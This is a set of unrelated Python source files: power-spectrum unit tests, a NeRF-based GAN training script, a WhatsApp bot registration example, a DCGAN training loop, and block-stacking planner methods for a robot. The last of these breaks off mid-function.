ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC
# compute G and H
Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')
Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')
Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,
band_covar=C)
# assert row-sum is normalized to 1
assert np.isclose(Wv.sum(axis=1).real, 1).all()
# assert this is a real matrix, even though imag is populated
assert np.isclose(Wv.imag, 0, atol=1e-6).all()
def test_get_argparser():
args = pspecdata.get_pspec_run_argparser()
a = args.parse_args([['foo'], 'bar', '--dset_pairs', '0~0,1~1', '--pol_pairs', 'xx~xx,yy~yy',
'--spw_ranges', '300~400, 600~800', '--blpairs', '24~25~24~25, 37~38~37~38'])
assert a.pol_pairs == [('xx', 'xx'), ('yy', 'yy')]
assert a.dset_pairs == [(0, 0), (1, 1)]
assert a.spw_ranges == [(300, 400), (600, 800)]
assert a.blpairs == [((24, 25), (24, 25)), ((37, 38), (37, 38))]
def test_get_argparser_backwards_compatibility():
args = pspecdata.get_pspec_run_argparser()
a = args.parse_args([['foo'], 'bar', '--dset_pairs', '0 0, 1 1', '--pol_pairs', 'xx xx, yy yy',
'--spw_ranges', '300 400, 600 800', '--blpairs', '24 25 24 25, 37 38 37 38'])
assert a.pol_pairs == [('xx', 'xx'), ('yy', 'yy')]
assert a.dset_pairs == [(0, 0), (1, 1)]
assert a.spw_ranges == [(300, 400), (600, 800)]
assert a.blpairs == [((24, 25), (24, 25)), ((37, 38), (37, 38))]
"""
# LEGACY MONTE CARLO TESTS
def validate_get_G(self,tolerance=0.2,NDRAWS=100,NCHAN=8):
'''
Test get_G where we interpret G in this case to be the Fisher Matrix.
Args:
tolerance, required max fractional difference from analytical
solution to pass.
NDRAWS, number of random data sets to sample frome.
NCHAN, number of channels. Must be less than test data sets.
'''
#read in data.
dpath=os.path.join(DATA_PATH,'zen.2458042.12552.xx.HH.uvXAA')
data=uv.UVData()
wghts=uv.UVData()
data.read_miriad(dpath)
wghts.read_miriad(dpath)
assert(NCHAN<data.Nfreqs)
#make sure we use fewer channels.
data.select(freq_chans=range(NCHAN))
wghts.select(freq_chans=range(NCHAN))
#********************************************************************
#set data to random white noise with a random variance and mean.
##!!!Set mean to zero for now since analyitic solutions assumed mean
##!!!Subtracted data which oqe isn't actually doing.
#*******************************************************************
test_mean=0.*np.abs(np.random.randn())
test_std=np.abs(np.random.randn())
#*******************************************************************
#Make sure that all of the flags are set too true for analytic case.
#*******************************************************************
data.flag_array[:]=False
wghts.data_array[:]=1.
wghts.flag_array[:]=False
bllist=data.get_antpairs()
#*******************************************************************
#These are the averaged "fisher matrices"
#*******************************************************************
f_mat=np.zeros((data.Nfreqs,data.Nfreqs),dtype=complex)
f_mat_true=np.zeros((data.Nfreqs,data.Nfreqs),dtype=complex)
nsamples=0
for datanum in range(NDATA):
#for each data draw, generate a random data set.
pspec=pspecdata.PSpecData()
data.data_array=test_std\
*np.random.standard_normal(size=data.data_array.shape)\
/np.sqrt(2.)+1j*test_std\
*np.random.standard_normal(size=data.data_array.shape)\
/np.sqrt(2.)+(1.+1j)*test_mean
pspec.add([data],[wghts])
#get empirical Fisher matrix for baselines 0 and 1.
pair1=bllist[0]
pair2=bllist[1]
k1=(0,pair1[0],pair1[1],-5)
k2=(0,pair2[0],pair2[1],-5)
#add to fisher averages.
f_mat_true=f_mat_true+pspec.get_F(k1,k2,true_fisher=True)
f_mat=f_mat+pspec.get_F(k1,k2)
#test identity
self.assertTrue(np.allclose(pspec.get_F(k1,k2,use_identity=True)/data.Nfreqs**2.,
np.identity(data.Nfreqs).astype(complex)))
del pspec
#divide out empirical Fisher matrices by analytic solutions.
f_mat=f_mat/NDATA/data.Nfreqs**2.*test_std**4.
f_mat_true=f_mat_true/NDATA/data.Nfreqs**2.*test_std**4.
#test equality to analytic solutions
self.assertTrue(np.allclose(f_mat,
np.identity(data.Nfreqs).astype(complex),
rtol=tolerance,
atol=tolerance)
self.assertTrue(np.allclose(f_mat_true,
np.identity(data.Nfreqs).astype(complex),
rtol=tolerance,
atol=tolerance)
#TODO: Need a test case for some kind of taper.
def validate_get_MW(self,NCHANS=20):
'''
Test get_MW with analytical case.
Args:
NCHANS, number of channels to validate.
'''
###
test_std=np.abs(np.random.randn())
f_mat=np.identity(NCHANS).astype(complex)/test_std**4.*nchans**2.
pspec=pspecdata.PSpecData()
m,w=pspec.get_MW(f_mat,mode='G^-1')
#test M/W matrices are close to analytic solutions
#check that rows in W sum to unity.
self.assertTrue(np.all(np.abs(w.sum(axis=1)-1.)<=tolerance))
#check that W is analytic soluton (identity)
self.assertTrue(np.allclose(w,np.identity(nchans).astype(complex)))
#check that M.F = W
self.assertTrue(np.allclose(np.dot(m,f_mat),w))
m,w=pspec.get_MW(f_mat,mode='G^-1/2')
#check W is identity
self.assertTrue(np.allclose(w,np.identity(nchans).astype(complex)))
self.assertTrue(np.allclose(np.dot(m,f_mat),w))
#check that L^-1 runs.
m,w=pspec.get_MW(f_mat,mode='G^-1')
def validate_q_hat(self,NCHAN=8,NDATA=1000,):
'''
validate q_hat calculation by drawing random white noise data sets
'''
dpath=os.path.join(DATA_PATH,'zen.2458042.12552.xx.HH.uvXAA')
data=uv.UVData()
wghts=uv.UVData()
data.read_miriad(dpath)
wghts.read_miriad(dpath)
assert(NCHAN<=data.Nfreqs)
data.select(freq_chans=range(NCHAN))
wghts.select(freq_chans=range(NCHAN))
#***************************************************************
#set data to random white noise with a random variance and mean
#q_hat does not subtract a mean so I will set it to zero for
#the test.
#****************************************************************
test_mean=0.*np.abs(np.random.randn())#*np.abs(np.random.randn())
test_std=np.abs(np.random.randn())
data.flag_array[:]=False#Make sure that all of the flags are set too true for analytic case.
wghts.data_array[:]=1.
wghts.flag_array[:]=False
bllist=data.get_antpairs()
q_hat=np.zeros(NCHAN).astype(complex)
q_hat_id=np.zeros_like(q_hat)
q_hat_fft=np.zeros_like(q_hat)
nsamples=0
for datanum in range(NDATA):
pspec=pspecdata.PSpecData()
data.data_array=test_std*np.random.standard_normal(size=data.data_array.shape)/np.sqrt(2.)\
+1j*test_std*np.random.standard_normal(size=data.data_array.shape)/np.sqrt(2.)+(1.+1j)*test_mean
pspec.add([data],[wghts])
for j in range(data.Nbls):
#get baseline index
pair1=bllist[j]
k1=(0,pair1[0],pair1[1],-5)
k2=(0,pair1[0],pair1[1],-5)
#get q
#test identity
q_hat=q_hat+np.mean(pspec.q_hat(k1,k2,use_fft=False),
axis=1)
q_hat_id=q_hat_id+np.mean(pspec.q_hat(k1,k2,use_identity=True),
axis=1)
q_hat_fft=q_hat_fft+np.mean(pspec.q_hat(k1,k2),axis=1)
nsamples=nsamples+1
del pspec
#print nsamples
nfactor=test_std**2./data.Nfreqs/nsamples
q_hat=q_hat*nfactor
q_hat_id=q_hat_id*nfactor/test_std**4.
q_hat_fft=q_hat_fft*nfactor
#print q_hat
#print q_hat_id
#print q_hat_fft
self.assertTrue(np.allclose(q_hat,
np.identity(data.Nfreqs).astype(complex)))
self.assertTrue(np.allclose(q_hat_id,
np.identity(data.Nfreqs).astype(complex)))
self.assertTrue(np.allclose(q_hat_fft,
np.identity(data.Nfreqs).astype(complex)))
"""
if __name__ == "__main__":
unittest.main()
|
11520504
|
import argparse
import os
from os import path
import time
import copy
import torch
torch.set_default_tensor_type('torch.cuda.FloatTensor')
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
import matplotlib
matplotlib.use('Agg')
import sys
sys.path.append('submodules') # needed to make imports work in GAN_stability
from graf.gan_training import Trainer, Evaluator
from graf.config import get_data, build_models, save_config, update_config, build_lr_scheduler
from graf.utils import count_trainable_parameters, get_nsamples
from graf.transforms import ImgToPatch
from GAN_stability.gan_training import utils
from GAN_stability.gan_training.train import update_average
from GAN_stability.gan_training.logger import Logger
from GAN_stability.gan_training.checkpoints import CheckpointIO
from GAN_stability.gan_training.distributions import get_ydist, get_zdist
from GAN_stability.gan_training.config import (
load_config, build_optimizers,
)
if __name__ == '__main__':
# Arguments
parser = argparse.ArgumentParser(
description='Train a GAN with different regularization strategies.'
)
parser.add_argument('config', type=str, help='Path to config file.')
args, unknown = parser.parse_known_args()
config = load_config(args.config, 'configs/default.yaml')
config['data']['fov'] = float(config['data']['fov'])
config = update_config(config, unknown)
# Short hands
batch_size = config['training']['batch_size']
restart_every = config['training']['restart_every']
fid_every = config['training']['fid_every']
save_every = config['training']['save_every']
backup_every = config['training']['backup_every']
save_best = config['training']['save_best']
assert save_best=='fid' or save_best=='kid', 'Invalid save best metric!'
out_dir = os.path.join(config['training']['outdir'], config['expname'])
checkpoint_dir = path.join(out_dir, 'chkpts')
# Create missing directories
if not path.exists(out_dir):
os.makedirs(out_dir)
if not path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
# Save config file
save_config(os.path.join(out_dir, 'config.yaml'), config)
# Logger
checkpoint_io = CheckpointIO(
checkpoint_dir=checkpoint_dir
)
device = torch.device("cuda:0")
# Dataset
train_dataset, hwfr, render_poses = get_data(config)
# in case of orthographic projection replace focal length by far-near
if config['data']['orthographic']:
hw_ortho = (config['data']['far']-config['data']['near'], config['data']['far']-config['data']['near'])
hwfr[2] = hw_ortho
config['data']['hwfr'] = hwfr # add for building generator
print(train_dataset, hwfr, render_poses.shape)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
num_workers=config['training']['nworkers'],
shuffle=True, pin_memory=True, sampler=None, drop_last=True
)
val_dataset = train_dataset
val_loader = train_loader
hwfr_val = hwfr
# Create models
generator, discriminator = build_models(config)
print('Generator params: %d' % count_trainable_parameters(generator))
print('Discriminator params: %d, channels: %d' % (count_trainable_parameters(discriminator), discriminator.nc))
print(generator.render_kwargs_train['network_fn'])
print(discriminator)
# Put models on gpu if needed
generator = generator.to(device)
discriminator = discriminator.to(device)
g_optimizer, d_optimizer = build_optimizers(
generator, discriminator, config
)
# input transform
img_to_patch = ImgToPatch(generator.ray_sampler, hwfr[:3])
# Register modules to checkpoint
checkpoint_io.register_modules(
discriminator=discriminator,
g_optimizer=g_optimizer,
d_optimizer=d_optimizer,
**generator.module_dict # treat NeRF specially
)
# Get model file
model_file = config['training']['model_file']
stats_file = 'stats.p'
# Logger
logger = Logger(
log_dir=path.join(out_dir, 'logs'),
img_dir=path.join(out_dir, 'imgs'),
monitoring=config['training']['monitoring'],
monitoring_dir=path.join(out_dir, 'monitoring')
)
# Distributions
ydist = get_ydist(1, device=device) # Dummy to keep GAN training structure in tact
y = torch.zeros(batch_size) # Dummy to keep GAN training structure in tact
zdist = get_zdist(config['z_dist']['type'], config['z_dist']['dim'],
device=device)
# Save for tests
n_test_samples_with_same_shape_code = config['training']['n_test_samples_with_same_shape_code']
ntest = batch_size
x_real = get_nsamples(train_loader, ntest)
ytest = torch.zeros(ntest)
ztest = zdist.sample((ntest,))
ptest = torch.stack([generator.sample_pose() for i in range(ntest)])
if n_test_samples_with_same_shape_code > 0:
ntest *= n_test_samples_with_same_shape_code
ytest = ytest.repeat(n_test_samples_with_same_shape_code)
ptest = ptest.unsqueeze_(1).expand(-1, n_test_samples_with_same_shape_code, -1, -1).flatten(0, 1) # (ntest x n_same_shape) x 3 x 4
zdim_shape = config['z_dist']['dim'] - config['z_dist']['dim_appearance']
# repeat shape code
zshape = ztest[:, :zdim_shape].unsqueeze(1).expand(-1, n_test_samples_with_same_shape_code, -1).flatten(0, 1)
zappearance = zdist.sample((ntest,))[:, zdim_shape:]
ztest = torch.cat([zshape, zappearance], dim=1)
utils.save_images(x_real, path.join(out_dir, 'real.png'))
# Test generator
if config['training']['take_model_average']:
generator_test = copy.deepcopy(generator)
# we have to change the pointers of the parameter function in nerf manually
generator_test.parameters = lambda: generator_test._parameters
generator_test.named_parameters = lambda: generator_test._named_parameters
checkpoint_io.register_modules(**{k+'_test': v for k, v in generator_test.module_dict.items()})
else:
generator_test = generator
# Evaluator
evaluator = Evaluator(fid_every > 0, generator_test, zdist, ydist,
batch_size=batch_size, device=device, inception_nsamples=33)
# Initialize fid+kid evaluator
if fid_every > 0:
fid_cache_file = os.path.join(out_dir, 'fid_cache_train.npz')
kid_cache_file = os.path.join(out_dir, 'kid_cache_train.npz')
evaluator.inception_eval.initialize_target(val_loader, cache_file=fid_cache_file, act_cache_file=kid_cache_file)
# Train
tstart = t0 = time.time()
# Load checkpoint if it exists
try:
load_dict = checkpoint_io.load(model_file)
except FileNotFoundError:
it = epoch_idx = -1
fid_best = float('inf')
kid_best = float('inf')
else:
it = load_dict.get('it', -1)
epoch_idx = load_dict.get('epoch_idx', -1)
fid_best = load_dict.get('fid_best', float('inf'))
kid_best = load_dict.get('kid_best', float('inf'))
logger.load_stats(stats_file)
# Reinitialize model average if needed
if (config['training']['take_model_average']
and config['training']['model_average_reinit']):
update_average(generator_test, generator, 0.)
# Learning rate anneling
d_lr = d_optimizer.param_groups[0]['lr']
g_lr = g_optimizer.param_groups[0]['lr']
g_scheduler = build_lr_scheduler(g_optimizer, config, last_epoch=it)
d_scheduler = build_lr_scheduler(d_optimizer, config, last_epoch=it)
# ensure lr is not decreased again
d_optimizer.param_groups[0]['lr'] = d_lr
g_optimizer.param_groups[0]['lr'] = g_lr
# Trainer
trainer = Trainer(
generator, discriminator, g_optimizer, d_optimizer,
use_amp=config['training']['use_amp'],
gan_type=config['training']['gan_type'],
reg_type=config['training']['reg_type'],
reg_param=config['training']['reg_param']
)
print('it {}: start with LR:\n\td_lr: {}\tg_lr: {}'.format(it, d_optimizer.param_groups[0]['lr'], g_optimizer.param_groups[0]['lr']))
# Training loop
print('Start training...')
while True:
epoch_idx += 1
print('Start epoch %d...' % epoch_idx)
for x_real in train_loader:
t_it = time.time()
it += 1
generator.ray_sampler.iterations = it # for scale annealing
# Sample patches for real data
rgbs = img_to_patch(x_real.to(device)) # N_samples x C
# Discriminator updates
z = zdist.sample((batch_size,))
dloss, reg = trainer.discriminator_trainstep(rgbs, y=y, z=z)
logger.add('losses', 'discriminator', dloss, it=it)
logger.add('losses', 'regularizer', reg, it=it)
# Generators updates
if config['nerf']['decrease_noise']:
generator.decrease_nerf_noise(it)
z = zdist.sample((batch_size,))
gloss = trainer.generator_trainstep(y=y, z=z)
logger.add('losses', 'generator', gloss, it=it)
if config['training']['take_model_average']:
update_average(generator_test, generator,
beta=config['training']['model_average_beta'])
# Update learning rate
g_scheduler.step()
d_scheduler.step()
d_lr = d_optimizer.param_groups[0]['lr']
g_lr = g_optimizer.param_groups[0]['lr']
logger.add('learning_rates', 'discriminator', d_lr, it=it)
logger.add('learning_rates', 'generator', g_lr, it=it)
dt = time.time() - t_it
# Print stats
if ((it + 1) % config['training']['print_every']) == 0:
g_loss_last = logger.get_last('losses', 'generator')
d_loss_last = logger.get_last('losses', 'discriminator')
d_reg_last = logger.get_last('losses', 'regularizer')
print('[%s epoch %0d, it %4d, t %0.3f] g_loss = %.4f, d_loss = %.4f, reg=%.4f'
% (config['expname'], epoch_idx, it + 1, dt, g_loss_last, d_loss_last, d_reg_last))
# (ii) Sample if necessary
if ((it % config['training']['sample_every']) == 0) or ((it < 500) and (it % 100 == 0)):
rgb, depth, acc = evaluator.create_samples(ztest.to(device), poses=ptest)
logger.add_imgs(rgb, 'rgb', it)
logger.add_imgs(depth, 'depth', it)
logger.add_imgs(acc, 'acc', it)
# (v) Compute fid if necessary
if fid_every > 0 and ((it + 1) % fid_every) == 0:
fid, kid = evaluator.compute_fid_kid()
logger.add('validation', 'fid', fid, it=it)
logger.add('validation', 'kid', kid, it=it)
torch.cuda.empty_cache()
# save best model
if save_best=='fid' and fid < fid_best:
fid_best = fid
print('Saving best model...')
checkpoint_io.save('model_best.pt', it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
logger.save_stats('stats_best.p')
torch.cuda.empty_cache()
elif save_best=='kid' and kid < kid_best:
kid_best = kid
print('Saving best model...')
checkpoint_io.save('model_best.pt', it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
logger.save_stats('stats_best.p')
torch.cuda.empty_cache()
# (vi) Create video if necessary
if ((it+1) % config['training']['video_every']) == 0:
N_samples = 4
zvid = zdist.sample((N_samples,))
basename = os.path.join(out_dir, '{}_{:06d}_'.format(os.path.basename(config['expname']), it))
evaluator.make_video(basename, zvid, render_poses, as_gif=False)
# (i) Backup if necessary
if ((it + 1) % backup_every) == 0:
print('Saving backup...')
checkpoint_io.save('model_%08d.pt' % it, it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
logger.save_stats('stats_%08d.p' % it)
# (vi) Save checkpoint if necessary
if time.time() - t0 > save_every:
print('Saving checkpoint...')
checkpoint_io.save(model_file, it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
logger.save_stats('stats.p')
t0 = time.time()
if (restart_every > 0 and t0 - tstart > restart_every):
exit(3)
|
11520515
|
from aiohttp import web
from waio import Bot, Dispatcher
from waio.states import StatesGroup, BaseState, FSMContext
from waio.types import Message
from waio.logs import loguru_filter
from waio.storage import RedisStorage
loguru_filter.set_level('DEBUG')
bot = Bot(
apikey='API_KEY',
src_name='SRC_NAME',
phone_number=79281112233
)
storage = RedisStorage(prefix_fsm='fsm', redis_url="redis://localhost:6379")
dp = Dispatcher(bot=bot, storage=storage)
class RegisterStates(StatesGroup):
birthday = BaseState()
email = BaseState()
@dp.message_handler(commands=['register'], state='*')
async def register_name(message: Message, state: FSMContext):
await message.answer(f'Hi, {message.sender_name}! send your date of birth')
await state.set_state(RegisterStates.birthday)
@dp.message_handler(state=RegisterStates.birthday)
async def register_age(message: Message, state: FSMContext):
await state.set_data(birthday=message.text)
await message.answer(f'Thanks for sending you birthday!\n'
f'Send you email address')
await state.set_state(RegisterStates.email)
@dp.message_handler(state=RegisterStates.email)
async def register_age(message: Message, state: FSMContext):
await state.set_data(email=message.text)
state_data_certain = await state.get_data("email", "birthday")
# Alternative for get all data:
# await state.get_data()
await message.answer(f'Register completed...\n\n'
f'Your name: {message.sender_name}\n'
f'Your email: {state_data_certain["email"]}\n'
f'Your birthday: {state_data_certain["birthday"]}\n')
await state.finish(clear_data=True)
async def handler_gupshup(request):
event = await request.json()
await dp.handle_event(event)
return web.Response(status=200)
if __name__ == "__main__":
webhook = web.Application()
webhook.add_routes([web.post('/api/v1/gupshup/hook', handler_gupshup)])
web.run_app(webhook, port=8017)
|
11520521
|
import os
import time
import fnmatch
from random import shuffle
import numpy as np
import tensorflow as tf
from image_ops import get_image, save_images
def generate_z(sample_size, z_dim):
"""Helper function to generate noise vector.
Can replace this with a different noise function.
Args:
sample_size: sample/batch size
z_dim: dimensionality of z noise
Returns:
random noise, dimensionality is (sample_size, z_dim)
"""
return np.random.uniform(-1, 1,
size=(sample_size, z_dim)).astype(np.float32)
def train(dcgan):
"""Train DCGAN.
Preconditions:
checkpoint, data, logs directories exist
Postconditions:
checkpoints are saved
logs are written
Args:
dcgan: DCGAN object
"""
sess = dcgan.sess
FLAGS = dcgan.f
# load dataset
list_file = os.path.join(FLAGS.data_dir, '{0}.txt'.format(FLAGS.dataset))
if os.path.exists(list_file):
# load from file when found
print "Using training list: {0}".format(list_file)
with open(list_file, 'r') as f:
data = [os.path.join(FLAGS.data_dir,
FLAGS.dataset, l.strip()) for l in f]
else:
# recursively walk dataset directory to get images
data = []
dataset_dir = os.path.join(FLAGS.data_dir, FLAGS.dataset)
for root, dirnames, filenames in os.walk(dataset_dir):
for filename in fnmatch.filter(filenames, '*.{0}'.format(FLAGS.image_ext)):
data.append(os.path.join(root, filename))
shuffle(data)
# save to file for next time
with open(list_file, 'w') as f:
for l in data:
line = l.replace(dataset_dir + os.sep, '')
f.write('{0}\n'.format(line))
assert len(data) > 0, "found 0 training data"
print "Found {0} training images.".format(len(data))
# set up Adam optimizers
d_optim = tf.train.AdamOptimizer(
FLAGS.learning_rate,
beta1=FLAGS.beta1
).minimize(dcgan.d_loss, var_list=dcgan.d_vars)
g_optim = tf.train.AdamOptimizer(
FLAGS.learning_rate,
beta1=FLAGS.beta1
).minimize(dcgan.g_loss, var_list=dcgan.g_vars)
tf.global_variables_initializer().run()
# summaries
g_sum = tf.summary.merge([dcgan.z_sum, dcgan.d_fake_sum,
dcgan.g_sum, dcgan.d_loss_fake_sum, dcgan.g_loss_sum])
d_sum = tf.summary.merge([dcgan.z_sum, dcgan.d_real_sum,
dcgan.real_sum, dcgan.d_loss_real_sum, dcgan.d_loss_sum])
writer = tf.summary.FileWriter(os.path.join(FLAGS.log_dir,
dcgan.get_model_dir()), sess.graph)
# training images for sampling
sample_files = data[0:FLAGS.sample_size]
sample = [get_image(sample_file,
FLAGS.output_size) for sample_file in sample_files]
sample_images = np.array(sample).astype(np.float32)
sample_path = os.path.join('./', FLAGS.sample_dir,
dcgan.get_model_dir(),
'real_samples.png')
save_images(sample_images, sample_path)
# z for sampling
sample_z = generate_z(FLAGS.sample_size, FLAGS.z_dim)
# run for number of epochs
counter = 1
start_time = time.time()
for epoch in xrange(FLAGS.epoch):
num_batches = int(len(data) / FLAGS.batch_size)
# training iterations
for batch_index in xrange(0, num_batches):
# get batch of images for training
batch_start = batch_index*FLAGS.batch_size
batch_end = (batch_index+1)*FLAGS.batch_size
batch_files = data[batch_start:batch_end]
batch_images = [get_image(batch_file,
FLAGS.output_size) for batch_file in batch_files]
# create batch of random z vectors for training
batch_z = generate_z(FLAGS.batch_size, FLAGS.z_dim)
# update D network
_, summary_str = sess.run([d_optim, d_sum],
feed_dict={dcgan.real_images: batch_images, dcgan.z: batch_z})
writer.add_summary(summary_str, counter)
# update G network
_, summary_str = sess.run([g_optim, g_sum],
feed_dict={dcgan.z: batch_z})
writer.add_summary(summary_str, counter)
# update G network again for stability
_, summary_str = sess.run([g_optim, g_sum],
feed_dict={dcgan.z: batch_z})
writer.add_summary(summary_str, counter)
# compute errors
errD_fake = dcgan.d_loss_fake.eval({dcgan.z: batch_z})
errD_real = dcgan.d_loss_real.eval({dcgan.real_images: batch_images})
errG = dcgan.g_loss.eval({dcgan.z: batch_z})
# increment global counter (for saving models)
counter += 1
# print stats
print "[train] epoch: {0}, iter: {1}/{2}, time: {3}, d_loss: {4}, g_loss: {5}".format(
epoch, batch_index, num_batches, time.time() - start_time, errD_fake+errD_real, errG)
# sample every 100 iterations
if np.mod(counter, 100) == 1:
samples, d_loss, g_loss = dcgan.sess.run(
[dcgan.G, dcgan.d_loss, dcgan.g_loss],
feed_dict={dcgan.z: sample_z,
dcgan.real_images: sample_images})
print "[sample] time: {0}, d_loss: {1}, g_loss: {2}".format(
time.time() - start_time, d_loss, g_loss)
# save samples for visualization
sample_path = os.path.join('./', FLAGS.sample_dir,
dcgan.get_model_dir(),
'train_{0:02d}_{1:04d}.png'.format(epoch, batch_index))
save_images(samples, sample_path)
# save model every 500 iterations
if np.mod(counter, 500) == 2:
dcgan.save(counter)
print "[checkpoint] saved: {0}".format(time.time() - start_time)
# save final model
dcgan.save(counter)
print "[checkpoint] saved: {0}".format(time.time() - start_time)
|
11520553
|
from midca.modules._plan import modified_pyhop
import time
def point_at_m(state, objectID):
return [("block_until_seen", objectID), ("point_to", objectID)]
def pickup_m(state, objectID):
#if get_last_position(state, objectID) == "table":
#if get_last_clear_status(state, object) == 'clear':
return [("reach_to_pickup", objectID), ("grab", objectID), ("raising", objectID)]
#return False
#return [("block_until_seen", objectID), ("reach", objectID)]
def unstack_m(state, b1):
#if get_last_position(state, b1)== b2:
#if get_last_clear_status(state, object) == 'clear':
return [("reach_to_unstack", b1, get_last_position(state, b1)), ("grab", b1), ("raising", b1)]
#return False
def get_last_position(state, objectOrID):
positions = state.all_pos(objectOrID)
if not positions:
return None
else:
for state_pos in reversed(positions):
if state_pos.position:
return (state_pos.position)
return None
def get_last_clear_status(state, objectOrID):
positions = state.all_pos(objectOrID)
if not positions:
return None
else:
for state_pos in reversed(positions):
if state_pos.isclear:
return (state_pos.isclear)
return None
def get_top_status(state, objectOrID):
allobject = all_blocks(state)
for each in allobject:
if(get_last_position(state,each) == objectOrID):
return each
return False
def get_status_in_arm(state):
allobject = all_blocks(state)
block = None
for each in allobject:
if(get_last_position(state,each) == "in-arm"):
block = each
break
if block is None:
return False
return block
def get_max_height_position_block(state , objectOrID):
'''
print("%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%")
print("in max height position")
print("the object is")
print(objectOrID)
print("get top status")
print(get_top_status(state, objectOrID))
print("get last clear status")
print(get_last_clear_status(state,objectOrID ))
'''
print("the object is ")
print(objectOrID)
print("the top status is ")
print((get_top_status(state, objectOrID)))
if (get_last_clear_status(state, objectOrID) == 'clear'):
print("Result is ")
print("")
print(objectOrID)
return objectOrID
else:
return(get_max_height_position_block(state , get_top_status(state, objectOrID)))
def giveindirectobject(state,directobject):
for each in all_blocks(state):
if each in goal_pos_dic and not (each == directobject):
return each
break
return False
def all_blocks(state):
return state.all_objects()
#return ['green block', 'red block' , 'blue block']
def achieve_goals_m(state, goals):
print("achieve_goals_m")
if goals:
g = goals
goal = goals[0]
get_goal_pos(goal)
object = goal["directObject"]
print(("goal objective is " + goal["objective"] ))
#print(object + " is " + get_last_clear_status(state, object))
if goal["objective"] == "show-loc":
return [("point_at", goal["directObject"]), ("achieve_goals", goals[1:])]
if goal["objective"] == "stacking":
print("holding")
return [("move_blocks", goal), ("achieve_goals", goals[1:])]
if goal["objective"] == "holding":
'''
print("STATUS")
print(" last clear status of green block")
print(get_last_clear_status(state, 'green block'))
print(" last clear status of blue block")
print(get_last_clear_status(state, 'blue block'))
print(" last clear status of red block")
print(get_last_clear_status(state, 'red block'))
print("")
print("")
raw_input("status")
print("")
print("")
print("------------------------------------------------------")
print("Position")
print(" last position of green block")
print(get_last_position(state, 'green block'))
print(" last position of blue block")
print(get_last_position(state, 'blue block'))
print(" last position of red block")
print(get_last_position(state, 'red block'))
print("")
print("")
raw_input("status")
print("***********************************************************")
print("in holding")
print("the object is" )
print(object)
print("last clear status of object")
print(get_last_clear_status(state, object))
print("get last position of direct object")
print(get_last_position(state, goal["directObject"]))
print("get maximum height position")
print("*******************************************************")
print(get_max_height_position_block(state , object))
print("")
raw_input("enter")
'''
if get_last_position(state, goal["directObject"]) == 'in-arm':
return [("achieve_goals", goals[1:])]
if not get_status_in_arm(state):
if get_last_clear_status(state, object) == 'clear':
return [("pickup_task", goal["directObject"]), ("achieve_goals", goals[1:])]
else:
return [("move_one", get_max_height_position_block(state , object) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
else:
return [("move_one", get_status_in_arm(state) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
if goal["objective"] == "moving":
if get_last_position(state, goal["directObject"]) == 'table':
return [("achieve_goals", goals[1:])]
elif not get_status_in_arm(state):
if get_last_clear_status(state, object) == 'clear':
return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
else:
return [("move_one", get_max_height_position_block(state , object) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
else:
if get_last_position(state, goal["directObject"]) == 'table':
return [("achieve_goals", goals[1:])]
return [("move_one", get_status_in_arm(state) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
'''
if get_last_clear_status(state, object) == 'clear':
return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
if get_last_clear_status(state, object) == 'not clear':
if get_last_position(state, object) == "in-arm":
return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
else:
return [('move_one',get_top_status(state, object)),('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
# else:
# return [("unstack_t", "green block", goal["directObject"]), ("pickup", goal["directObject"]), ("achieve_goals", goals[1:])]
#
'''
else:
print("null")
return False #fail if goal is not of known type
return [] #return empty plan if no goals.
"""
Here are some helper functions that are used in the methods' preconditions.
"""
goal_pos_dic = {}
def get_goal_pos(goal):
poses = goal["pos"]
goal_pos_dic.update({poses.split(":")[0]: poses.split(":")[1]})
def is_done(b1,state,goal):
print("The given block is : " )
print(b1)
print("----------------------")
if b1 == 'table': return True
if b1 in goal_pos_dic:
print((goal_pos_dic[b1]))
else:
print("no!")
if b1 in goal_pos_dic and str(goal_pos_dic[b1]) != str(get_last_position(state, b1)):
#print("return false")
return False
if get_last_position(state, b1)== 'table': return True
if get_last_position(state, b1) in list(goal_pos_dic.values()) and (b1 not in goal_pos_dic or goal_pos_dic[b1] != get_last_position(state, b1)):
return False
#raw_input('Enter ...')
return is_done(get_last_position(state, b1),state,goal)
def status(b1,state,goal):
#print("***********")
#print(get_last_clear_status(state, b1))
direct_object = goal["directObject"]
indirect_object = giveindirectobject(state,direct_object)
status = get_last_clear_status(state, b1)
last_position = get_last_position(state, b1)
indirect_last_position = get_last_position(state, indirect_object)
top_position = get_top_status(state, b1)
direct_object_status = get_last_clear_status(state, direct_object)
indirect_object_status = get_last_clear_status(state, indirect_object)
status_in_arm = get_status_in_arm(state)
'''
print("direct object is ")
print(direct_object)
print("indirect object is ")
print(indirect_object)
print("status of the block")
print(status)
print("status in arm")
print(status_in_arm)
print("the block is ")
print(b1)
print("last position of block")
print(last_position)
print("top position of block")
print(top_position)
print("direct object status is ")
print(direct_object_status)
print("indirect object status is ")
print(indirect_object_status)
print("")
print("")
print("")
print("&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&")
'''
#raw_input("enter")
if indirect_last_position == direct_object:
return 'done'
if status_in_arm:
if b1 == status_in_arm:
if b1 == direct_object :
# print("In the condition of direct object in arm")
return 'move-to-table'
